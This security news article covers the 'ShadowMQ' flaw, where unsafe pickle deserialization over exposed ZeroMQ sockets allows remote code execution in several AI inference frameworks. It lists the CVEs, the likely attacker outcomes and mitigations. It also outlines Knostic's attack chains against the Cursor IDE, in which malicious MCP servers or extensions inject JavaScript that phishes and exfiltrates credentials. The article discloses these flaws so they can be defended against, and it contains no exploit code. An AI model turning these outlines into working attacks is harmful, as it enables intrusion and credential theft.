ShadowMQ Vulnerability: Critical Security Flaws in AI Inference Platforms

Security researchers have uncovered a widespread vulnerability pattern affecting major AI inference frameworks from Meta, Nvidia, Microsoft, and popular open-source projects. The root cause? Unsafe implementation of ZeroMQ messaging with Python pickle deserialization—a dangerous combination that enables remote code execution across the AI ecosystem.

The Discovery: One Flaw, Multiple Victims

In what cybersecurity researchers are calling the “ShadowMQ” pattern, a systematic investigation by Oligo Security has revealed that critical security vulnerabilities have propagated throughout the artificial intelligence infrastructure ecosystem. The issue isn’t isolated to a single vendor—it spans the entire landscape of AI inference engines that power production machine learning deployments.

Understanding the Technical Root Cause

The Dangerous Combination

At the heart of these vulnerabilities lies an architectural decision that seemed innocuous but proved catastrophic: the use of ZeroMQ’s recv_pyobj() method for network communication. This method automatically deserializes incoming data using Python’s pickle module, which is inherently unsafe when processing untrusted input.

The problem compounds when these ZeroMQ sockets are exposed over network interfaces without proper authentication mechanisms. This combination creates a perfect storm where attackers can inject malicious serialized objects that execute arbitrary code when deserialized on the target system.

How Code Reuse Amplified the Problem

The vulnerability’s reach extends far beyond its origin point due to a common software development practice: code reuse. What began as a single implementation flaw in Meta’s infrastructure became an industry-wide security crisis as developers copied and adapted code between projects.

Security analysis revealed troubling evidence of direct code copying:

SGLang documentation explicitly acknowledges adaptation from vLLM
Modular Max Server incorporated vulnerable logic from both vLLM and SGLang
Nearly identical unsafe patterns appear across different maintainers and organizations

Each time vulnerable code was copied, the security flaw multiplied, creating a cascading effect throughout the AI infrastructure ecosystem.

Affected Platforms and CVE Assignments

Meta’s Llama Framework

The initial vulnerability was discovered in Meta’s Llama large language model framework, tracked as CVE-2024-50050. This flaw carried a CVSS score ranging from 6.3 to 9.3, depending on the specific deployment configuration and exposure level.

Meta has since patched this vulnerability, and complementary fixes have been implemented in the pyzmq Python library that provides the underlying ZeroMQ bindings.

NVIDIA TensorRT-LLM

NVIDIA’s inference optimization framework contained the same vulnerability pattern, assigned CVE-2025-23254 with a CVSS score of 8.8. The company addressed this critical flaw in version 0.18.2 of TensorRT-LLM.

vLLM (Open Source)

The popular open-source inference server vLLM received vulnerability designation CVE-2025-30165 with a CVSS score of 8.0. While not fully patched in the traditional sense, the project has mitigated the issue by switching to the V1 engine as the default configuration.

Modular Max Server

Modular’s Max Server infrastructure was assigned CVE-2025-60455. The company has implemented fixes to address the vulnerability in their platform.

Still at Risk

Two additional platforms remain vulnerable at the time of this publication:

Microsoft Sarathi-Serve: No patch currently available
SGLang: Partial mitigation implemented, but incomplete fixes leave residual risk

Attack Scenarios and Impact Assessment

What Attackers Can Achieve

The consequences of successful exploitation are severe and multifaceted:

Infrastructure Compromise: An attacker who successfully exploits these vulnerabilities gains arbitrary code execution on inference nodes. Since inference engines typically run with elevated privileges and access to sensitive resources, this provides a powerful foothold within AI infrastructure.

Lateral Movement: Modern AI deployments operate in clustered environments. Compromising a single inference node can enable lateral movement throughout the cluster, potentially affecting entire machine learning pipelines.

Intellectual Property Theft: AI models represent significant intellectual property investments. Attackers with code execution capabilities can exfiltrate proprietary models, training data, and algorithmic implementations.

Resource Hijacking: Compromised inference infrastructure presents an attractive target for cryptocurrency mining operations. The high-performance compute resources typical of AI deployments are ideal for cryptomining, and such abuse can persist undetected for extended periods.

Model Poisoning: Beyond simple theft, attackers could potentially manipulate models or inject backdoors that alter inference results in subtle ways, undermining the integrity of AI-powered decisions.

Extended Threat Surface: Development Environments

The Cursor Browser Vulnerability

Parallel research from Knostic has identified additional attack vectors in AI-assisted development environments. Their investigation focused on Cursor’s integrated browser feature and revealed two distinct exploitation paths:

JavaScript Injection via MCP Servers: Attackers can craft malicious Model Context Protocol (MCP) servers that bypass Cursor’s security controls. When executed, these rogue servers inject code that replaces legitimate login interfaces with credential-harvesting phishing pages.

The attack sequence works as follows:

User downloads and configures a malicious MCP server via an mcp.json file
The MCP server injects JavaScript into Cursor’s built-in browser
Injected code redirects users to fake authentication pages
Credentials are exfiltrated to attacker-controlled infrastructure

Malicious Extension Attacks: Given that Cursor is essentially a fork of Visual Studio Code, it inherits the extension ecosystem’s security challenges. Attackers can develop malicious extensions that inject JavaScript directly into the IDE’s Node.js interpreter.

Once JavaScript execution is achieved within the interpreter context, attackers inherit the IDE’s full privilege set:

Complete filesystem access
Ability to modify or replace installed extensions
Capability to manipulate IDE functions
Persistence mechanisms that survive IDE restarts

The Broader Implication: Interpreter-Level Compromise

The Cursor vulnerabilities highlight a critical architectural concern that extends beyond individual bugs. When malicious code gains execution within the Node.js interpreter—whether through extensions, MCP servers, or prompt injection—it operates with the same permissions as the IDE itself.

This elevation transforms the development environment into what Knostic describes as a “malware distribution and exfiltration platform.” The compromised IDE can:

Inject malicious code into projects
Steal sensitive source code and credentials
Modify build processes to introduce supply chain compromises
Establish persistent backdoors in the development workflow

Defense Strategies and Mitigation Guidance

For AI Infrastructure Operators

Immediate Actions:

Patch Management: Update all inference frameworks to the latest versions that include security fixes
Network Segmentation: Isolate inference infrastructure behind robust network controls
Authentication Requirements: Implement strong authentication for all inter-service communication
Monitoring Implementation: Deploy detection mechanisms for unusual deserialization activity

Long-term Architecture Improvements:

Replace pickle deserialization with safer alternatives (JSON, Protocol Buffers, etc.)
Implement principle of least privilege for inference service accounts
Establish secure channels for inter-process communication
Regular security audits of custom implementations

For Development Environment Security

IDE Configuration Best Practices:

Disable Auto-Run Features: Prevent automatic execution of untrusted code
Extension Vetting: Install only extensions from verified publishers
MCP Server Auditing: Review source code before deploying MCP servers
API Key Hygiene: Use minimally-scoped API keys for development tools
Repository Trust Verification: Validate MCP servers from official, trusted repositories

Data Access Controls:

Audit which data sources MCP servers can access
Restrict API permissions to minimal required scope
Monitor for unusual data access patterns
Implement logging for all MCP server activities

Industry Response and Lessons Learned

The Velocity Problem

Oligo Security researcher Avi Lumelsky contextualized the issue within the broader AI development landscape: “Projects are moving at incredible speed, and it’s common to borrow architectural components from peers. But when code reuse includes unsafe patterns, the consequences ripple outward fast.”

This observation highlights a fundamental tension in modern AI development. The rapid pace of innovation encourages code sharing and reuse to accelerate progress. However, when security-critical code is copied without thorough review, vulnerabilities propagate at the same velocity as innovation.

Breaking the Chain

The ShadowMQ pattern reveals the need for improved security practices in fast-moving technology sectors:

Code Review Culture: Organizations must maintain rigorous security review processes even when adapting code from reputable sources. The origin of code doesn’t guarantee its security posture.

Secure Defaults: Framework developers should prioritize secure-by-default configurations. The fact that unsafe deserialization patterns persisted across multiple projects suggests that secure alternatives weren’t sufficiently obvious or accessible.

Supply Chain Awareness: Understanding the provenance and security characteristics of incorporated code is essential. Teams should maintain awareness of which external components include security-sensitive functionality.

Looking Forward: Securing AI Infrastructure

Industry-Wide Implications

These vulnerabilities underscore that AI infrastructure faces unique security challenges at the intersection of high-performance computing, distributed systems, and machine learning. As AI deployment scales, the attack surface expands proportionally.

Recommendations for Framework Developers

Security-First Design: Prioritize security considerations in architectural decisions, particularly for network-facing components
Safer Serialization: Move away from pickle and similar unsafe serialization formats for any network-facing interfaces
Documentation: Clearly document security considerations when providing reference implementations
Security Audits: Conduct regular third-party security assessments of critical infrastructure components

Call to Action

Organizations deploying AI inference infrastructure should:

Conduct immediate vulnerability assessments of their inference platforms
Review network exposure of inference services
Implement comprehensive monitoring for exploitation attempts
Establish incident response procedures specific to AI infrastructure compromise

Conclusion

The ShadowMQ vulnerability pattern serves as a stark reminder that even in cutting-edge technology domains, fundamental security principles remain critical. The propagation of unsafe deserialization practices through code reuse demonstrates how quickly vulnerabilities can spread in interconnected software ecosystems.

As artificial intelligence becomes increasingly central to business operations and critical infrastructure, securing AI systems must receive commensurate attention. The industry must balance the velocity of innovation with the rigor of security engineering—a challenge that will only grow more pressing as AI deployment accelerates.

Technical References

CVE Identifiers:

CVE-2024-50050: Meta Llama Framework (Patched)
CVE-2025-23254: NVIDIA TensorRT-LLM (Fixed in v0.18.2)
CVE-2025-30165: vLLM (Mitigated via V1 engine default)
CVE-2025-60455: Modular Max Server (Fixed)

Vulnerability Source:

Oligo Security Research Report: “ShadowMQ: How Code Reuse Spread Critical Vulnerabilities Across the AI Ecosystem”
Knostic Security Research: “MCP Hijacked: Cursor Browser Exploitation”

Affected Technologies:

ZeroMQ (pyzmq library)
Python pickle module
Various AI inference frameworks and development tools

This article is based on security research published by Oligo Security and Knostic. Organizations using affected technologies should consult vendor security advisories and apply recommended patches immediately.